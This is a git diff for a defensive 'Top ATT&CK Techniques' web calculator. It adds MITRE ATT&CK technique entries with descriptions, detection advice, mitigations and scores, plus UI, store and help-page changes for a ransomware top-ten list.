+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "MA-5",
+            "SC-17",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.1523809523809524,
+            "mitigation_score": 0.2909090909090909
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1606.001",
+        "name": "Forge Web Credentials: Web Cookies",
+        "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)",
+        "url": "https://attack.mitre.org/techniques/T1606/001",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Web Credential: Web Credential Creation",
+            "Web Credential: Web Credential Usage"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1606",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            }
+        ],
+        "cumulative_score": 0.19523809523809527,
+        "adjusted_score": 0.19523809523809527,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-6",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1606.002",
+        "name": "Forge Web Credentials: SAML Tokens",
+        "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)",
+        "url": "https://attack.mitre.org/techniques/T1606/002",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\n\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS",
+            "Windows"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Web Credential: Web Credential Creation",
+            "Web Credential: Web Credential Usage"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1606",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
             {
                 "mid": "M1018",
                 "name": "User Account Management",
@@ -20772,9 +43938,9 @@
                 "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.3023809523809524,
-        "adjusted_score": 0.3023809523809524,
-        "has_car": false,
+        "cumulative_score": 0.21904761904761905,
+        "adjusted_score": 0.21904761904761905,
+        "has_car": true,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
@@ -20792,23 +43958,13 @@
         "nist_controls": [
             "AC-2",
             "AC-3",
-            "AC-5",
-            "AC-6",
-            "MA-5",
-            "SC-17",
-            "SI-2"
+            "AC-6"
         ],
         "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1523809523809524,
-            "mitigation_score": 0.2909090909090909
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
         "tid": "T1608",
@@ -20932,6 +44088,206 @@
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
+    {
+        "tid": "T1608.001",
+        "name": "Stage Capabilities: Upload Malware",
+        "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.",
+        "url": "https://attack.mitre.org/techniques/T1608/001",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1608",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1608.002",
+        "name": "Stage Capabilities: Upload Tool",
+        "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.",
+        "url": "https://attack.mitre.org/techniques/T1608/002",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1608",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1608.003",
+        "name": "Stage Capabilities: Install Digital Certificate",
+        "description": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)\n\nAdversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. \n\nAdversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).",
+        "url": "https://attack.mitre.org/techniques/T1608/003",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1608",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1608.004",
+        "name": "Stage Capabilities: Drive-by Target",
+        "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+        "url": "https://attack.mitre.org/techniques/T1608/004",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1608",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1608.005",
+        "name": "Stage Capabilities: Link Target",
+        "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.",
+        "url": "https://attack.mitre.org/techniques/T1608/005",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1608",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
     {
         "tid": "T1609",
         "name": "Container Administration Command",
@@ -21332,6 +44688,44 @@
         "choke_point_score": 0.1,
         "prevalence_score": 0
     },
+    {
+        "tid": "T1614.001",
+        "name": "System Location Discovery: System Language Discovery",
+        "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.",
+        "url": "https://attack.mitre.org/techniques/T1614/001",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Access"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1614",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
     {
         "tid": "T1615",
         "name": "Group Policy Discovery",
diff --git a/src/index.css b/src/index.css
index 1c05292..db2b8e1 100644
--- a/src/index.css
+++ b/src/index.css
@@ -34,13 +34,8 @@ h1, h2, h3, h4, h5, h6 {
 #description a {
     @apply text-ctid-blue hover:underline
 }
-
-/* Navigation */
-.navbar {
-    @apply fixed bg-ctid-navy text-white pt-1 w-full top-0 z-50
-}
-.navbar h1 {
-    @apply my-auto font-medium text-xl uppercase w-max
+#description p {
+    @apply mb-2;
 }
 
 /* Homepage */
@@ -139,8 +134,11 @@ h1, h2, h3, h4, h5, h6 {
 .p-tooltip-text {
     @apply bg-ctid-light-purple/80 text-ctid-black
 }
-.p-tabmenu-ink-bar {
-    @apply  bg-ctid-light-purple;
+.p-tabmenu-ink-bar, .p-tabview-ink-bar {
+    @apply  bg-ctid-light-purple ;
+}
+.p-tabview-ink-bar {
+    @apply bg-ctid-primary-purple -mb-[1px]
 }
 .p-highlight .p-menuitem-text {
     @apply text-ctid-light-purple
@@ -148,6 +146,20 @@ h1, h2, h3, h4, h5, h6 {
 .p-menubar-root-list {
     @apply w-60 -ml-40
 }
+
+.p-tabview-nav-content .p-tabview-header {
+    @apply uppercase mx-1 my-1 font-bold text-xl;
+    font-family: "Fira Sans Extra Condensed", sans-serif;
+}
+.p-tabview-nav-content.p-tabview-nav {
+    @apply gap-2 w-max cursor-pointer;
+}
+.p-tabview-nav-content .p-tabview a {
+    @apply px-4 py-1 text-xl;
+}
+.p-tabview-nav {
+    @apply w-5/6 mx-auto border-b-2 border-solid
+}
 .p-splitbutton.p-component {
     @apply w-full bg-ctid-navy text-white rounded-none my-4 ;
 }
diff --git a/src/stores/calculator.store.ts b/src/stores/calculator.store.ts
index 6d224d6..c169507 100644
--- a/src/stores/calculator.store.ts
+++ b/src/stores/calculator.store.ts
@@ -41,6 +41,37 @@ export const useCalculatorStore = defineStore("calculator", {
       cloud: { label: "None", value: 1 },
       hardware: { label: "None", value: 1 },
     },
+    topTenListInfo: [
+      {
+        id: "ransomware",
+        name: "Ransomware",
+        description: "This is the Ransomware list",
+        techniques: [
+          "T1486",
+          "T1490",
+          "T1027",
+          "T1059",
+          "T1036",
+          "T1112",
+          "T1047",
+          "T1562.001",
+          "T1204",
+          "T1059.001",
+        ],
+      },
+      // {
+      //   id: "sector",
+      //   name: "Sector",
+      //   description: "This is the Sector list",
+      //   techniques: []
+      // },
+      // {
+      //   id: "black_cat",
+      //   name: "BlackCat",
+      //   description: "This is the BlackCat list",
+      //   techniques: []
+      // },
+    ],
   }),
   getters: {
     activeFilters(state) {
@@ -58,7 +89,11 @@ export const useCalculatorStore = defineStore("calculator", {
     allCISOptions(state) {
       return state.filterPropertiesObj.cis.options.map((i) => i.name);
     },
+    topTenLists(state) {
+      return state.topTenListInfo;
+    },
   },
+
   actions: {
     updateActiveFilters(filterValues: {
       nist: Set;
@@ -143,6 +178,17 @@ export const useCalculatorStore = defineStore("calculator", {
       this.filterPropertiesObj.cis.options = cis_array;
       this.filterPropertiesObj.os.options = platform_array;
     },
+    getTopTenList(ids: Array): Array {
+      // return static list as determined by list of ids sent in
+      const ransomwareTop = [] as Array;
+      for (const id of ids) {
+        const technique = this.techniques.find((t) => t.tid === id);
+        if (technique) {
+          ransomwareTop.push(technique);
+        }
+      }
+      return ransomwareTop;
+    },
   },
 });
 // Define Calculator Store Type
diff --git a/src/views/HomePage.vue b/src/views/HomePage.vue
index f05ee06..74b8bad 100644
--- a/src/views/HomePage.vue
+++ b/src/views/HomePage.vue
@@ -18,16 +18,16 @@
         

           
+            :imgSrc="CalculatorSvg" link="calculator" linkText="Go To Calculator" />
           
+            :imgSrc="ListSvg" link="top-10-lists" linkText="View Top 10 Lists" />
           
+            :imgSrc="BookSvg" link="methodology" linkText="Read About It" />
           
+            :imgSrc="HelpSvg" link="help" linkText="Learn More" />
         

       

     

@@ -60,11 +60,11 @@
         
       
     
-    

-      

-        Ransomware Top 10 Techniques
-      

-      
content coming soon...

+    

+      

+        
Ransomware Top 10 Techniques

+      

+      
     

   
 
@@ -76,17 +76,27 @@ import CalculatorSvg from "@/assets/calculator.svg";
 import ListSvg from "@/assets/list.svg";
 import BookSvg from "@/assets/book.svg";
 import HelpSvg from "@/assets/help.svg";
+import { useCalculatorStore } from "@/stores/calculator.store";
+import TopTenWrapper from "@/components/TopTenWrapper.vue";
 
 export default defineComponent({
-  components: { SectionItem },
+  components: { SectionItem, TopTenWrapper },
   data() {
     return {
+      calculatorStore: useCalculatorStore(),
       CalculatorSvg,
       ListSvg,
       BookSvg,
       HelpSvg,
     };
   },
+  computed: {
+    rankedList() {
+      // fetch static ransomware list from calculator store
+      // edit items in that list by changing the ID list in the store
+      return this.calculatorStore.getTopTenList(this.calculatorStore.topTenLists[0].techniques)
+    }
+  },
 });
 
 
diff --git a/src/views/TopTen.vue b/src/views/TopTen.vue
index 2726d27..688c5e6 100644
--- a/src/views/TopTen.vue
+++ b/src/views/TopTen.vue
@@ -1,15 +1,50 @@
 
 
 
diff --git a/src/views/TopTenResults.vue b/src/views/TopTenResults.vue
index 58bfcd7..86b652f 100644
--- a/src/views/TopTenResults.vue
+++ b/src/views/TopTenResults.vue
@@ -6,48 +6,18 @@
                 
             
         
-        
-        

-            
-            
-        

+        
     
 
 
 
 
-
+
diff --git a/src/components/TopTenDetails.vue b/src/components/TopTenDetails.vue
index 2039b4f..b531fe5 100644
--- a/src/components/TopTenDetails.vue
+++ b/src/components/TopTenDetails.vue
@@ -1,11 +1,11 @@
 
 
diff --git a/src/views/HelpPage.vue b/src/views/HelpPage.vue
index a392fb9..928ae15 100644
--- a/src/views/HelpPage.vue
+++ b/src/views/HelpPage.vue
@@ -2,11 +2,9 @@
   

     

       
How to Use the Calculator

-      
Top ATT&CK Techniques is your resource. Tell us about the challenges you face
-        as
-        a defender and let us offer some suggestions you may not have thought about. A Top ATT&CK Techniques
-        Specialist
-        will address your query and respond promptly.

+      
Instructions for using Top ATT&CK Techniques. If you run into any issues with the
+        calculator or this website, use the links below to send us feedback.
+      

     

     

       

@@ -16,7 +14,7 @@
           

           

             
Which ATT&CK Version is the calculator using?

-            
The calculator was built using ATT&CK Version 14.0

+            
The calculator was built using ATT&CK Version {{ calculatorStore.attackVersion }}

             
Can the user import their own data?

             
The user cannot input their own data into the calculator. However, if you go to our Github you will find
               our excel document that you can manipulate for local use.

@@ -43,9 +41,8 @@
           

             

               
The filters section is located on the left side of the Calculator tab. Filters were created to allow
-                the
-                user to eliminate certain techniques that do not apply to their environment. Each filter is made up of
-                components that we used to create our methodology. Each component is mapped to one or more ATT&CK
+                the user to eliminate certain techniques that do not apply to their environment. Each filter is made up
+                of components that we used to create our methodology. Each component is mapped to one or more ATT&CK
                 technique. If a user deselects each component for a specific technique, then that technique will be
                 removed from pool of available techniques. Each filter was implemented at the subtechnique level, if
                 applicable.

@@ -55,20 +52,16 @@
                 selected/deselected, depending upon the environment. If only Windows machines exist, selecting Windows
                 will remove all techniques that are that do not apply to Windows.

               
For instance, under NIST 800-53, the Configuration Management (CM) Control Family is an option. If
-                someone
-                works in Incident Response, they might have less interest in ATT&CK techniques that can be mitigated
-                with
